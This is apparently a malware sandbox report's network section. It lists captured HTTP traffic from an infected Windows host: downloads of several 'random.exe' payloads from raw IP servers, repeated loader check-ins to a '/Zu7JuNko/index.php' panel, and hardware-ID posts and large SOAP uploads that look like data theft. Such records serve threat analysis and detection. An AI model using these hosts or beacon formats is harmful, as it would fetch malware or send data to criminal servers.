00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:02:03 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 37 30 30 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1070072001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070073001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070074001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 103.84.89.222:33791Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070075001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070076001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 103.84.89.222:33791Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBHost: 185.215.113.115Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 37 44 32 37 37 46 31 41 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 2d 2d 0d 0a Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="hwid"3F7D277F1A24796922796------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build"reno------IDAKJKEHDBGHIDHIEHDB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070077001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070078001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/none1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070079001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070080001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 103.84.89.222:33791Content-Length: 2315246Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 185.215.113.115Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 37 44 32 37 37 46 31 41 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="hwid"3F7D277F1A24796922796------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="build"reno------HJEHIJEBKEBFBFHIIDHI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 103.84.89.222:33791Content-Length: 2315238Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.215.113.115Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 37 44 32 37 37 46 31 41 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="hwid"3F7D277F1A24796922796------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="build"reno------GHDHJEBFBFHJECAKFCAA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 185.215.113.115Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 37 44 32 37 37 46 31 41 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="hwid"3F7D277F1A24796922796------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="build"reno------HIDHIEGIIIECAKEBFBAA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 37 42 37 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A77B75A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 185.215.113.115Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 37 44 32 37 37 46 31 41 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="hwid"3F7D277F1A24796922796------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="build"reno------CAKKEGDGCGDAKEBFIJEC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
